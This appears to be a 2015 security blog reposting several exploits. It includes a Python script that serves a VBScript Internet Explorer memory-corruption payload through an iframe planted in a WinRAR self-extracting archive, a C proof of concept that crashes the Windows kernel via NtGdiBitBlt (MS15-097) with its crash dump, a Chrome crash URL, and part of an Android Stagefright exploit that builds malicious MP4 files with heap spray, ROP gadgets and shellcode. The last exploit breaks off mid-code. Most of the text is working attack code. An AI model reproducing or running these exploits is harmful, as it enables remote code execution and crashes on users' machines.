
Friday 25 September 2015

AJITH KP

WinRaR SFX - OLE Code Execution Exploit

Hi GuyZ,
     WinRAR is one of the most popular compression tools on Windows. A recently published proof of concept abuses WinRAR's self-extracting (SFX) archives: the "Text to display in SFX window" field is rendered as HTML by an embedded browser control, so an attacker can plant an <iframe> that pulls a page from a server they control, and a VBScript payload on that page runs a command (calc.exe in the PoC) when the archive is opened. Note that the payload relies on a memory-corruption bug in the browser engine that renders the text — the script exits unless the user agent reports 32-bit MSIE — so it only succeeds on hosts whose Internet Explorer engine is still vulnerable. The practical takeaway is that an SFX archive is an executable and should be treated with the same suspicion as any other .exe from an untrusted source.

Video POC


Exploit

#!/usr/bin/python -w
# Title : WinRar SFX OLE Command Execution
# Date : 25/09/2015
# Author : R-73eN
# Tested on : Windows Xp SP3 with WinRAR 5.21
#
# Triggering the Vulnerability
# Run this python script
# Right click a file and then click on add to archive.
# check the 'Create SFX archive' box
# go to Advanced tab
# go to SFX options
# go to Text And icon
# copy the code that the script will generate to 'Text to display into sfx windows'
# Click OK two times and the sfx archive is generated.
# If someone opens that sfx archive a calculator should pop up.
#
# Video : https://youtu.be/vIslLJYvnaM
#
  
# ASCII-art "InfoGen AL" banner shown before the IP prompt; raw strings keep
# the backslashes in the art literal (the original relied on invalid escapes
# being preserved verbatim).
_BANNER_LINES = [
    r"  ___        __        ____                 _    _  ",
    r" |_ _|_ __  / _| ___  / ___| ___ _ __      / \  | |    ",
    r"  | || '_ \| |_ / _ \| |  _ / _ \ '_ \    / _ \ | |    ",
    r"  | || | | |  _| (_) | |_| |  __/ | | |  / ___ \| |___ ",
    r" |___|_| |_|_|  \___/ \____|\___|_| |_| /_/   \_\_____|",
]
banner = "\n".join(_BANNER_LINES) + "\n\n"
print(banner)
  
import socket
  
CRLF = "\r\n"
#OLE command execution
exploit = """<html>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >
<head>
</head>
<body>
   
<SCRIPT LANGUAGE="VBScript">
  
function runmumaa() 
On Error Resume Next
set shell=createobject("Shell.Application")
shell.ShellExecute "calc.exe", "runas", 0
end function
</script>
   
<SCRIPT LANGUAGE="VBScript">
    
dim   aa()
dim   ab()
dim   a0
dim   a1
dim   a2
dim   a3
dim   win9x
dim   intVersion
dim   rnda
dim   funclass
dim   myarray
   
Begin()
   
function Begin()
  On Error Resume Next
  info=Navigator.UserAgent
   
  if(instr(info,"Win64")>0)   then
     exit   function
  end if
   
  if (instr(info,"MSIE")>0)   then 
             intVersion = CInt(Mid(info, InStr(info, "MSIE") + 5, 2))   
  else
     exit   function  
                
  end if
   
  win9x=0
   
  BeginInit()
  If Create()=True Then
     myarray=        chrw(01)&chrw(2176)&chrw(01)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00)
     myarray=myarray&chrw(00)&chrw(32767)&chrw(00)&chrw(0)
   
     if(intVersion<4) then
         document.write("<br> IE")
         document.write(intVersion)
         runshellcode()                    
     else  
          setnotsafemode()
     end if
  end if
end function
   
function BeginInit()
   Randomize()
   redim aa(5)
   redim ab(5)
   a0=13+17*rnd(6)
   a3=7+3*rnd(5)
end function
   
function Create()
  On Error Resume Next
  dim i
  Create=False
  For i = 0 To 400
    If Over()=True Then
       Create=True
       Exit For
    End If 
  Next
end function
   
sub testaa()
end sub
   
function mydata()
    On Error Resume Next
     i=testaa
     i=null
     redim  Preserve aa(a2)  
     
     ab(0)=0
     aa(a1)=i
     ab(0)=6.36598737437801E-314
   
     aa(a1+2)=myarray
     ab(2)=1.74088534731324E-310  
     mydata=aa(a1)
     redim  Preserve aa(a0)  
end function 
   
   
function setnotsafemode()
    On Error Resume Next
    i=mydata()  
    i=rum(i+8)
    i=rum(i+16)
    j=rum(i+&h134)  
    for k=0 to &h60 step 4
        j=rum(i+&h120+k)
        if(j=14) then
              j=0          
              redim  Preserve aa(a2)             
     aa(a1+2)(i+&h11c+k)=ab(4)
              redim  Preserve aa(a0)  
   
     j=0 
              j=rum(i+&h120+k)   
            
               Exit for
           end if
   
    next 
    ab(2)=1.69759663316747E-313
    runmumaa() 
end function
   
function Over()
    On Error Resume Next
    dim type1,type2,type3
    Over=False
    a0=a0+a3
    a1=a0+2
    a2=a0+&h8000000
     
    redim  Preserve aa(a0) 
    redim   ab(a0)     
     
    redim  Preserve aa(a2)
     
    type1=1
    ab(0)=1.123456789012345678901234567890
    aa(a0)=10
             
    If(IsObject(aa(a1-1)) = False) Then
       if(intVersion<4) then
           mem=cint(a0+1)*16             
           j=vartype(aa(a1-1))
           if((j=mem+4) or (j*8=mem+8)) then
              if(vartype(aa(a1-1))<>0)  Then    
                 If(IsObject(aa(a1)) = False ) Then             
                   type1=VarType(aa(a1))
                 end if               
              end if
           else
             redim  Preserve aa(a0)
             exit  function
   
           end if 
        else
           if(vartype(aa(a1-1))<>0)  Then    
              If(IsObject(aa(a1)) = False ) Then
                  type1=VarType(aa(a1))
              end if               
            end if
        end if
    end if
                 
       
    If(type1=&h2f66) Then         
          Over=True      
    End If  
    If(type1=&hB9AD) Then
          Over=True
          win9x=1
    End If  
   
    redim  Preserve aa(a0)          
           
end function
   
function rum(add) 
    On Error Resume Next
    redim  Preserve aa(a2)  
     
    ab(0)=0   
    aa(a1)=add+4     
    ab(0)=1.69759663316747E-313       
    rum=lenb(aa(a1))  
      
    ab(0)=0
    redim  Preserve aa(a0)
end function
   
</script>
   
</body>
</html>"""
response = "HTTP/1.1 200 OK" + CRLF + "Content-Type: text/html" + CRLF + "Connection: close" + CRLF + "Server: Apache" + CRLF + "Content-Length: " + str(len(exploit)) + CRLF + CRLF + exploit + CRLF 
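# --- single-shot HTTP server that hands the page above to the SFX stub ---
# The SFX "Text to display" field is rendered by an embedded browser control,
# so the <iframe> printed below makes whoever opens the archive fetch
# http://<host>:8080/ and execute the VBScript in `exploit`.  `host` is baked
# verbatim into the iframe, so it must be an address the target can reach
# (it is also the interface the server binds to).
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    _prompt = raw_input            # Python 2 (the rest of this script is 2.x)
except NameError:
    _prompt = input                # Python 3 fallback
host = _prompt(" Enter Local IP: ")
server_address = (host, 8080)      # port is hard-coded and also baked into the iframe
# allow an immediate restart on the same port after a previous run
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind(server_address)
print("[+] Server started " + host + " [+]")
sock.listen(1)
print("[+] Insert this code on the 'Text to display into sfx windows' [+]")
print("\n<iframe src='http://" + host + ":8080/'> </iframe>")
print("\n[+] Waiting for request . . . [+]")
connection = None
try:
    connection, client_address = sock.accept()
    connection.recv(2048)          # read (and ignore) the request; any request gets the page
    print("[+] Got request , sending exploit . . .[+]")
    # Send the complete HTTP response built above (status line, headers, body).
    # The original sent the bare HTML with connection.send(exploit) and left
    # `response` unused; sendall() also pushes the whole buffer instead of
    # whatever a single send() happens to accept.
    connection.sendall(response)
    print("[+] Exploit sent , A calc should pop up . .  [+]")
    print("\nhttps://www.infogen.al/\n")
finally:
    # close both sockets explicitly rather than leaking them to process exit
    if connection is not None:
        connection.close()
    sock.close()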

Thursday 24 September 2015

AJITH KP

Windows Kernel - NtGdiBitBlt Buffer Overflow (MS15-097)

Hi GuyZ,
     Another recently disclosed Windows kernel vulnerability: a buffer overflow (an out-of-bounds pool write) reachable through the NtGdiBitBlt system call in win32k.sys, addressed by MS15-097. The proof of concept below triggers it from a user-mode process by calling the syscall directly.

     For more details: https://code.google.com/p/google-security-research/issues/detail?id=474


The PoC reproduces reliably on Windows 7 32-bit with Special Pool enabled for win32k.sys (a Driver Verifier option). Special Pool is what turns the out-of-bounds byte write in win32k!memcpy into the immediate 0xD6 bugcheck shown below; without it the overflow may silently corrupt neighbouring pool memory instead of crashing. Either way this is a kernel-crash (denial of service) PoC, not a working privilege escalation, so run it only in a disposable VM with a kernel debugger attached.

POC

/*
 * compile:
 * cl.exe bug474.cpp user32.lib gdi32.lib shell32.lib
 */

#include <stdio.h>
#include <tchar.h>
#include <Windows.h>
#include <time.h>
 
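// Upper bound on how long we poll for the Notepad window before giving up.
static const DWORD NOTEPAD_WAIT_MS = 10000;

// Create an empty "<name>.txt", open it in notepad.exe and return the HWND of
// the Notepad window once it appears.  The title is matched both as
// "<name> - Notepad" and "<name>.txt - Notepad" (e.g. depending on whether
// Explorer hides known extensions).  Returns 0 if the file or the process
// cannot be created, or if no matching window shows up within
// NOTEPAD_WAIT_MS.  (The original fclose()d a NULL FILE* when fopen_s failed
// and spun forever if the window never appeared.)
HWND notepad(LPCSTR name) {
 char filename[1024], title[1024];
 FILE *f = 0x0;
 sprintf_s(filename, 1024, "%s.txt", name);
 errno_t rc = fopen_s(&f, filename, "w");
 if (rc != 0 || f == 0x0) {
  printf("[-] failed to create temporary text file\n");
  return 0x0;
 }
 fclose(f);
 HINSTANCE inst = ShellExecuteA(0x0, "open", "notepad.exe", filename, 0x0, SW_SHOW);
 if (inst < (HINSTANCE)33) {  // ShellExecute reports errors as values <= 32
  printf("[-] failed to start notepad\n");
  return 0x0;
 }
 DWORD start = GetTickCount();
 while (GetTickCount() - start < NOTEPAD_WAIT_MS) {  // unsigned diff survives tick wrap
  sprintf_s(title, 1024, "%s - Notepad", name);
  HWND hwnd = FindWindowA(0x0, title);
  if (hwnd) {
   return hwnd;
  }
  sprintf_s(title, 1024, "%s.txt - Notepad", name);
  hwnd = FindWindowA(0x0, title);
  if (hwnd) {
   return hwnd;
  }
  Sleep(50);  // do not busy-spin while Notepad starts up
 }
 printf("[-] failed to retrieve handle to notepad window\n");
 return 0x0;
}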


// Direct win32k syscall NtGdiSetLayout(hdc, d0, d1), entered through the
// KUSER_SHARED_DATA system-call stub pointer at 0x7ffe0300.  Service number
// 0x1123 is specific to the Windows 7 x86 build this PoC was written against
// (see the crash dump below); other builds use different numbers.  The
// leading `push 0x0` stands in for the return address the ntdll stub would
// normally leave on the stack.  Four dwords are pushed, so 0x10 bytes are
// cleaned afterwards.  The NTSTATUS comes back in eax and is returned
// implicitly (MSVC inline-asm idiom; the function has no explicit return).
__declspec(noinline) int __stdcall NtGdiSetLayout(HDC hdc, DWORD d0, DWORD d1) {
  __asm {
   push d1
   push d0
   push hdc
  push 0x0
  mov eax, 0x1123
  mov edx, 0x7ffe0300
  call dword ptr [edx]
  add esp, 0x10
 }
}

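// Direct win32k syscall NtGdiBitBlt, entered through the KUSER_SHARED_DATA
// system-call stub pointer at 0x7ffe0300.  Service number 0x100e is specific
// to the Windows 7 x86 build this PoC targets (see the crash dump below).
// The leading `push 0x0` stands in for the return address the ntdll stub
// would normally leave on the stack.  Ten dwords are pushed, so the caller
// must clean 0x28 bytes: the original added 0x30, leaving esp 8 bytes off,
// which presumably went unnoticed only because the compiler restored esp from
// ebp in the epilogue.  The NTSTATUS comes back in eax and is returned
// implicitly (MSVC inline-asm idiom).
__declspec(noinline) int __stdcall NtGdiBitBlt(HDC hdc, DWORD dw1, DWORD dw2,DWORD dw3,DWORD dw4,HDC hdc2,DWORD dw6,DWORD dw7, DWORD dw8) {
 __asm {
  push dw8
  push dw7
  push dw6
  push hdc2
  push dw4
  push dw3
  push dw2
  push dw1
  push hdc
  push 0x0                  ; fake return address of the ntdll stub
  mov eax, 0x100e           ; NtGdiBitBlt service number (Win7 x86)
  mov edx, 0x7ffe0300       ; SharedUserData system-call stub
  call dword ptr [edx]
  add esp, 0x28             ; 10 pushes * 4 bytes
 }
}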
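// Entry point.  WARNING: this is a denial-of-service PoC -- on a vulnerable
// win32k.sys it bugchecks the machine (0xD6 with Special Pool enabled, see the
// crash dump below), so run it only in a throw-away VM.
// Sequence: printer DC with an unusual layout value -> a Notepad window DC ->
// NtGdiBitBlt between the two with the crafted arguments.  Each handle is now
// checked so a missing printer driver or Notepad window produces a message
// instead of a syscall on a NULL handle.
int _tmain(int argc, _TCHAR* argv[])
{
 HDC hdc1 = CreateDCA(0,"Microsoft XPS Document Writer", 0, 0);
 printf("[-] hdc1: %08x\n", hdc1);
 if (!hdc1) {
  printf("[-] CreateDCA failed (is the 'Microsoft XPS Document Writer' printer installed?)\n");
  return 1;
 }
 NtGdiSetLayout(hdc1, 0x6d, 0xc5abb63);
 HWND hwnd1 = notepad("test1");
 printf("[-] hwnd1: %08x\n", hwnd1);
 if (!hwnd1) {
  printf("[-] no Notepad window handle, aborting\n");
  DeleteDC(hdc1);
  return 1;
 }
 HDC hdc2 = GetDC(hwnd1);
 printf("[-] hdc2: %08x\n", hdc2);
 if (!hdc2) {
  printf("[-] GetDC failed, aborting\n");
  DeleteDC(hdc1);
  return 1;
 }
 NtGdiBitBlt(hdc1, 0, 0xae, 0x4c, 0x1a, hdc2, 0xb2, 0x47, 0x330008);
 // Only reached on a patched kernel; release what we allocated.
 ReleaseDC(hwnd1, hdc2);
 DeleteDC(hdc1);
 return 0;
}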

Details

*** Fatal System Error: 0x000000d6
                       (0xFFA0B1B9,0x00000001,0x947F3EB4,0x00000000)

Driver at fault: 
***    win32k.sys - Address 947F3EB4 base at 94730000, DateStamp 00000000
.
Break instruction exception - code 80000003 (first chance)

A fatal system error has occurred.
Debugger entered on first try; Bugcheck callbacks have not been invoked.

A fatal system error has occurred.

Connected to Windows 7 7601 x86 compatible target at (Sun Jun 28 23:31:46.512 2015 (UTC + 2:00)), ptr64 FALSE
Loading Kernel Symbols
...............................................................
................................................................
.........................
Loading User Symbols
........................................
Loading unloaded module list
...............
*******************************************************************************
*                                                                             *
*                        Bugcheck Analysis                                    *
*                                                                             *
*******************************************************************************

Use !analyze -v to get detailed debugging information.

BugCheck D6, {ffa0b1b9, 1, 947f3eb4, 0}

*** WARNING: Unable to verify checksum for a10.exe
*** ERROR: Module load completed but symbols could not be loaded for a10.exe
Probably caused by : win32k.sys ( win32k!memcpy+74 )

Followup: MachineOwner
---------

Assertion: *** DPC watchdog timeout
    This is NOT a break in update time
    This is most likely a BUG in an ISR
    Perform a stack trace to find the culprit
    The period will be doubled on continuation
    Use gh to continue!!

nt!KeAccumulateTicks+0x3c5:
82a909ec cd2c            int     2Ch
kd> !analyze -v
*******************************************************************************
*                                                                             *
*                        Bugcheck Analysis                                    *
*                                                                             *
*******************************************************************************

DRIVER_PAGE_FAULT_BEYOND_END_OF_ALLOCATION (d6)
N bytes of memory was allocated and more than N bytes are being referenced.
This cannot be protected by try-except.
When possible, the guilty driver's name (Unicode string) is printed on
the bugcheck screen and saved in KiBugCheckDriver.
Arguments:
Arg1: ffa0b1b9, memory referenced
Arg2: 00000001, value 0 = read operation, 1 = write operation
Arg3: 947f3eb4, if non-zero, the address which referenced memory.
Arg4: 00000000, (reserved)

Debugging Details:
------------------


WRITE_ADDRESS:  ffa0b1b9 Special pool

FAULTING_IP: 
win32k!memcpy+74
947f3eb4 8807            mov     byte ptr [edi],al

MM_INTERNAL_CODE:  0

IMAGE_NAME:  win32k.sys

DEBUG_FLR_IMAGE_TIMESTAMP:  55635516

MODULE_NAME: win32k

FAULTING_MODULE: 94730000 win32k

DEFAULT_BUCKET_ID:  WIN7_DRIVER_FAULT

BUGCHECK_STR:  0xD6

PROCESS_NAME:  a10.exe

CURRENT_IRQL:  1c

TRAP_FRAME:  9f92edfc -- (.trap 0xffffffff9f92edfc)
ErrCode = 00000002
eax=000000ff ebx=ffa0b1b9 ecx=00000005 edx=00000001 esi=9f92eff5 edi=ffa0b1b9
eip=947f3eb4 esp=9f92ee70 ebp=9f92ee78 iopl=0         nv up ei pl nz na po nc
cs=0008  ss=0010  ds=0023  es=0023  fs=0030  gs=0000             efl=00010202
win32k!memcpy+0x74:
947f3eb4 8807            mov     byte ptr [edi],al          ds:0023:ffa0b1b9=??
Resetting default scope

LAST_CONTROL_TRANSFER:  from 82a8feb3 to 82a909ec

STACK_TEXT:  
9f92e820 82a8feb3 0002625a 00000000 00010300 nt!KeAccumulateTicks+0x3c5
9f92e860 82a8fd60 82e430a8 0f77c71d 00000000 nt!KeUpdateRunTime+0x145
9f92e8b8 82a8f563 9f92e802 9f92e802 000000d1 nt!KeUpdateSystemTime+0x613
9f92e8b8 82e430a8 9f92e802 9f92e802 000000d1 nt!KeUpdateSystemTimeAssist+0x13
9f92e93c 82e31b8c 00001000 00000000 9f92e99c hal!READ_PORT_USHORT+0x8
9f92e94c 82e31cf5 82af4582 c4073ec3 00000065 hal!HalpCheckPowerButton+0x2e
9f92e950 82af4582 c4073ec3 00000065 00000000 hal!HaliHaltSystem+0x7
9f92e99c 82af5029 00000003 00000000 00000002 nt!KiBugCheckDebugBreak+0x73
9f92ed60 82aa2ff9 00000050 ffa0b1b9 00000001 nt!KeBugCheck2+0x68b
9f92ede4 82a55a88 00000001 ffa0b1b9 00000000 nt!MmAccessFault+0x104
9f92ede4 947f3eb4 00000001 ffa0b1b9 00000000 nt!KiTrap0E+0xdc
9f92ee78 947c9a8a ffa0b1b9 9f92eff5 00000008 win32k!memcpy+0x74
9f92eed8 9477d91c 00000008 0b06bcfc 9f92f4a0 win32k!vSrcCopyS1D1LtoR+0x1eb
9f92f480 9477cf6e 9f92f608 00000019 ffa0ada8 win32k!BltLnkRect+0x91c
9f92f70c 947ec14c 00000000 fc2d2000 00000000 win32k!BltLnk+0x78b
9f92f798 9488811d 00000000 fc2d2010 00000000 win32k!EngBitBlt+0x4c5
9f92f834 9487dee2 ffa0adb8 ff0fadb8 00000000 win32k!EngStretchBltROP+0x282
9f92f914 947b0091 00000000 9f92fa54 94887e9b win32k!BLTRECORD::bStretch+0x459
9f92fa90 947acd2c ab21078b 00000000 000000ae win32k!GreStretchBltInternal+0x785
9f92facc 94807ac7 ab21078b 00000000 000000ae win32k!GreStretchBlt+0x30
9f92fbcc 947e4cda ab21078b 00000000 000000ae win32k!NtGdiBitBltInternal+0x765
9f92fc00 82a528a6 ab21078b 00000000 000000ae win32k!NtGdiBitBlt+0x2f
9f92fc00 77257074 ab21078b 00000000 000000ae nt!KiSystemServicePostCall
0018f7f8 011911cc 00000000 ab21078b 00000000 ntdll!KiFastSystemCallRet
WARNING: Stack unwind information not available. Following frames may be wrong.
0018f828 0119127e ab21078b 00000000 000000ae a10+0x11cc
0018f860 0119165d 00000001 0027efa8 00283738 a10+0x127e
0018f8a8 7577ee6c 7ffd9000 0018f8f4 7727399b a10+0x165d
0018f8b4 7727399b 7ffd9000 7739f8b6 00000000 kernel32!BaseThreadInitThunk+0xe
0018f8f4 7727396e 011916da 7ffd9000 00000000 ntdll!__RtlUserThreadStart+0x70
0018f90c 00000000 011916da 7ffd9000 00000000 ntdll!_RtlUserThreadStart+0x1b


STACK_COMMAND:  kb

FOLLOWUP_IP: 
win32k!memcpy+74
947f3eb4 8807            mov     byte ptr [edi],al

SYMBOL_STACK_INDEX:  b

SYMBOL_NAME:  win32k!memcpy+74

FOLLOWUP_NAME:  MachineOwner

FAILURE_BUCKET_ID:  0xD6_VRF_win32k!memcpy+74

BUCKET_ID:  0xD6_VRF_win32k!memcpy+74

Followup: MachineOwner
---------

Sunday 20 September 2015

AJITH KP

Crash Vulnerability found in Google Chrome

Hello GuyZ,
     A new crash bug has been found in Google Chrome by Andris Atteka. It is a denial of service rather than a code-execution issue, but it kills the browser immediately: the trigger URL contains a double-encoded NUL (%%30%30 decodes to %00, i.e. a null byte), which appears to trip Chrome's URL handling.



Vulnerability Report: https://code.google.com/p/chromium/issues/detail?id=533361

To reproduce, copy the URL http://aaa/%%30%30, paste it into the address bar and press Enter. Expect the browser to crash and close, so save any open work first.

Friday 18 September 2015

AJITH KP

Android libstagefright - Integer Overflow Remote Code Execution

Hi GuyZ,
     Android's media-parsing library, libstagefright, was recently found to contain the remotely exploitable "Stagefright" bugs. A further exploit has now been published. It abuses an integer overflow in the MP4 parser's handling of the 'tx3g' chunk size to overwrite the vtable pointer of an adjacent MPEG4DataSource object, and combines that with a heap spray and a libc ROP chain to run shellcode in the process that parses the file. Note that the code below hard-codes the libc base and spray addresses (libc_base, spray_address) and resolves gadgets from a libc.so you must supply, so it is tied to a specific device/firmware build and is not a point-and-shoot tool.



Exploit Code


#!/usr/bin/python2
  
import gzip
import io
import os
import struct
import sys

import cherrypy
import pwnlib.asm as asm
import pwnlib.elf as elf
  
  
# Raw ARM/Thumb shellcode produced out-of-band (shellcode.bin, next to the
# script), zero-padded so its length is a multiple of 4.
with open('shellcode.bin', 'rb') as tmp:
  shellcode = tmp.read()

shellcode += '\x00' * (-len(shellcode) % 4)
  
# heap grooming configuration (see exploit_mp4() for how each value is used)
alloc_size = 0x20          # size of the small groom allocations (pssh/avcC/hvcC)
groom_count = 0x4          # number of leading pssh groom chunks
spray_size = 0x100000      # bytes per heap_spray() chunk: 1 MiB of repeated 4 KiB pages
spray_count = 0x10         # how many such chunks are wrapped into the stbl

# address of the buffer we allocate for our shellcode
# (an RWX page the ROP chain mmap64()s with MAP_FIXED; assumed unused)
mmap_address = 0x90000000

# addresses that we need to predict
# Both are guesses about the target process layout: libc_base is where the
# supplied libc.so is assumed to be mapped, spray_address where the sprayed
# pages are expected to land.  They are device/firmware specific; a wrong
# guess presumably just crashes the parser, which is why the served page keeps
# reloading itself.
libc_base = 0xb6ebd000
spray_address = 0xb3000000

# ROP gadget addresses, filled in by find_rop_gadgets() from libc.so
stack_pivot = None             # add r2, r0, #0x4c; ldmia r2, {r4-lr}; ... (ARM)
pop_pc = None
pop_r0_r1_r2_r3_pc = None
pop_r4_r5_r6_r7_pc = None
ldr_lr_bx_lr = None            # ldr lr, [sp, #pad]; add sp, sp, #pad+8; bx lr
ldr_lr_bx_lr_stack_pad = 0     # the #pad displacement found for the gadget above
mmap64 = None                  # libc symbols, rebased onto libc_base
memcpy = None
  
def find_arm_gadget(e, gadget):
  """Locate `gadget` (ARM-mode assembly source) in the ELF `e`.

  The gadget is assembled, then the image is scanned for a 4-byte-aligned
  occurrence that reads back identically (printed as a sanity check).  As in
  the original, the last aligned candidate seen is returned even if the
  read-back never matched; None if there was no aligned candidate at all.
  """
  wanted = asm.asm(gadget, arch='arm')
  found = None
  for hit in e.search(wanted):
    if hit % 4 != 0:
      continue
    found = hit
    if e.read(found, len(wanted)) == wanted:
      print(asm.disasm(wanted, vma=found, arch='arm'))
      break
  return found
  
def find_thumb_gadget(e, gadget):
  """Locate `gadget` (Thumb assembly source) in the ELF `e`.

  Same scan as find_arm_gadget but with 2-byte alignment, and the returned
  address has the low bit set (Thumb interworking) so it can be used directly
  as a branch target.  The last aligned candidate is returned even if the
  read-back never matched; None if none was aligned.
  """
  wanted = asm.asm(gadget, arch='thumb')
  found = None
  for hit in e.search(wanted):
    if hit % 2 != 0:
      continue
    found = hit + 1  # set the Thumb bit
    if e.read(found - 1, len(wanted)) == wanted:
      print(asm.disasm(wanted, vma=found - 1, arch='thumb'))
      break
  return found
    
def find_gadget(e, gadget):
  """Find `gadget` in `e`, preferring a Thumb encoding, ARM as the fallback."""
  thumb = find_thumb_gadget(e, gadget)
  return thumb if thumb is not None else find_arm_gadget(e, gadget)
  
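def find_rop_gadgets(path):
  """Resolve the libc symbols and ROP gadgets used by heap_spray().

  `path` must be the libc.so of the target device: every address is rebased
  onto the hard-coded `libc_base` guess, so a libc from a different
  build/device yields a chain that only crashes the parser.  Fills the module
  globals memcpy, mmap64, stack_pivot, pop_pc, pop_r0_r1_r2_r3_pc,
  pop_r4_r5_r6_r7_pc, ldr_lr_bx_lr and ldr_lr_bx_lr_stack_pad.

  Raises RuntimeError as soon as a gadget cannot be found.  The original left
  the global as None, which only surfaced later as a cryptic struct.pack error
  in p32() (or, for ldr_lr_bx_lr, not until the chain ran on the device).
  """
  global memcpy
  global mmap64
  global stack_pivot
  global pop_pc
  global pop_r0_r1_r2_r3_pc
  global pop_r4_r5_r6_r7_pc
  global ldr_lr_bx_lr
  global ldr_lr_bx_lr_stack_pad

  def resolved(label, address):
    # report an address, or fail loudly if the search came up empty
    if address is None:
      raise RuntimeError('{}: gadget "{}" not found'.format(path, label))
    print('[*] {} : 0x{:08x}'.format(label, address))
    return address

  e = elf.ELF(path)
  e.address = libc_base  # rebase so symbols/gadgets come out as absolute addresses

  memcpy = resolved('memcpy', e.symbols['memcpy'])
  mmap64 = resolved('mmap64', e.symbols['mmap64'])

  # Stack pivot (ARM mode).  From the libc this was developed against:
  # .text:00013344    ADD             R2, R0, #0x4C
  # .text:00013348    LDMIA           R2, {R4-LR}
  # .text:0001334C    TEQ             SP, #0
  # .text:00013350    TEQNE           LR, #0
  # .text:00013354    BEQ             botch_0
  # .text:00013358    MOV             R0, R1
  # .text:0001335C    TEQ             R0, #0
  # .text:00013360    MOVEQ           R0, #1
  # .text:00013364    BX              LR
  # With r0 = the corrupted MPEG4DataSource this loads r4-lr (including sp)
  # from the object itself, which is what exploit_mp4() lays out at +0x4c.
  pivot_asm = ''
  pivot_asm += 'add   r2, r0, #0x4c\n'
  pivot_asm += 'ldmia r2, {r4 - lr}\n'
  pivot_asm += 'teq   sp, #0\n'
  pivot_asm += 'teqne lr, #0'
  stack_pivot = resolved('stack_pivot', find_arm_gadget(e, pivot_asm))

  pop_pc = resolved('pop_pc', find_gadget(e, 'pop {pc}'))
  pop_r0_r1_r2_r3_pc = resolved('pop_r0_r1_r2_r3_pc',
                                find_gadget(e, 'pop {r0, r1, r2, r3, pc}'))
  pop_r4_r5_r6_r7_pc = resolved('pop_r4_r5_r6_r7_pc',
                                find_gadget(e, 'pop {r4, r5, r6, r7, pc}'))

  # "ldr lr, [sp, #i]; add sp, sp, #i+8; bx lr" -- the displacement differs
  # between libc builds, so try 0..0xfc and remember the one that exists; the
  # chain pads the stack by that amount (ldr_lr_bx_lr_stack_pad).
  ldr_lr_bx_lr = None
  ldr_lr_bx_lr_stack_pad = 0
  for i in range(0, 0x100, 4):
    candidate = ('ldr lr, [sp, #0x{:08x}]\n'
                 'add sp, sp, #0x{:08x}\n'
                 'bx  lr').format(i, i + 8)
    ldr_lr_bx_lr = find_gadget(e, candidate)
    if ldr_lr_bx_lr is not None:
      ldr_lr_bx_lr_stack_pad = i
      break
  resolved('ldr_lr_bx_lr', ldr_lr_bx_lr)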
    
def pad(size):
  """Return `size` bytes of '#' filler (empty for size <= 0)."""
  return ''.ljust(size, '#')
  
def pb32(val):
  """Pack `val` as a big-endian unsigned 32-bit integer (MP4 box fields)."""
  return struct.Struct('>I').pack(val)
  
def pb64(val):
  """Pack `val` as a big-endian unsigned 64-bit integer (MP4 'largesize')."""
  return struct.Struct('>Q').pack(val)
  
def p32(val):
  """Pack `val` as a little-endian unsigned 32-bit integer (ARM pointers)."""
  return struct.Struct('<I').pack(val)
  
def p64(val):
  """Pack `val` as a little-endian unsigned 64-bit integer."""
  return struct.Struct('<Q').pack(val)
  
def chunk(tag, data, length=0):
  """Build an MP4/ISO-BMFF box: big-endian size, 4-byte tag, payload.

  `length` overrides the size field (default: len(data) + 8, the real box
  size).  A value wider than 32 bits is emitted in the "largesize" form -- a
  size field of 1 followed by a 64-bit length after the tag -- which is what
  the tx3g integer-overflow trick in exploit_mp4() relies on.
  """
  box_size = length if length else len(data) + 8
  if box_size > 0xffffffff:
    header = struct.pack('>I', 1) + tag + struct.pack('>Q', box_size)
  else:
    header = struct.pack('>I', box_size) + tag
  return header + data
  
def alloc_avcc(size):
  """An 'avcC' box with `size` bytes of 'A' payload -- a sized heap allocation for grooming."""
  return chunk('avcC', ''.ljust(size, 'A'))
  
def alloc_hvcc(size):
  """An 'hvcC' box with `size` bytes of 'H' payload -- a sized heap allocation for grooming."""
  return chunk('hvcC', ''.ljust(size, 'H'))
  
def sample_table(data):
  """Wrap `data` in a minimal 'stbl' box (empty stco/stsc/stsz/stts first).

  The sub-boxes are just enough for the parser to accept the table; the
  caller's `data` is appended after them.
  """
  parts = [
    chunk('stco', '\x00' * 8),
    chunk('stsc', '\x00' * 8),
    chunk('stsz', '\x00' * 12),
    chunk('stts', '\x00' * 8),
    data,
  ]
  return chunk('stbl', ''.join(parts))
  
def memory_leak(size):
  """A 'pssh' box carrying a 24-byte header and `size` bytes of 'L'.

  Despite the name it is used by exploit_mp4() purely as a groom allocation
  (the parser presumably keeps the pssh payload around), not to leak data.
  """
  body = ''.join(['leak', 'L' * 16, pb32(size), 'L' * size])
  return chunk('pssh', body)
  
def heap_spray(size):
  """Build a 'pssh' box whose payload is `size` bytes of repeated 4 KiB pages.

  Each page is laid out as:
    0x000  Thumb nop sled
    0x100  shellcode (from shellcode.bin), then 0xcc filler up to
    0xed0  fake MPEG4DataSource vtable entry -> stack_pivot, followed by the
           ROP chain: mmap64() an RWX page at mmap_address, memcpy() the
           start of the sprayed page (sled + shellcode) into it, jump there.
  The chain treats `spray_address - 0xed0` as the start of one of these
  pages, i.e. it assumes spray_address points at the 0xed0 offset of a page;
  the original comment ("spray_address + len(rop_stack)") described the
  memcpy source differently.  All gadget globals must already be resolved by
  find_rop_gadgets(); a None here fails inside p32().
  """
  pssh = 'spry'
  pssh += 'S' * 16
  pssh += pb32(size)

  page = ''

  nop = asm.asm('nop', arch='thumb')
  while len(page) < 0x100:
    page += nop
  page += shellcode
  while len(page) < 0xed0:
    page += '\xcc'

  # MPEG4DataSource fake vtable
  page += p32(stack_pivot)

  # pivot swaps stack then returns to pop {pc}
  page += p32(pop_r0_r1_r2_r3_pc)

  # mmap64(mmap_address,
  #        0x1000,
  #        PROT_READ | PROT_WRITE | PROT_EXECUTE,
  #        MAP_PRIVATE | MAP_FIXED | MAP_ANONYMOUS,
  #        -1,
  #        0);

  page += p32(mmap_address)             # r0 = address
  page += p32(0x1000)                   # r1 = size
  page += p32(7)                        # r2 = protection (RWX)
  page += p32(0x32)                     # r3 = flags (0x2 | 0x10 | 0x20)
  page += p32(ldr_lr_bx_lr)             # pc

  # ldr_lr_bx_lr loads lr from [sp + pad] and skips pad + 8 bytes of stack,
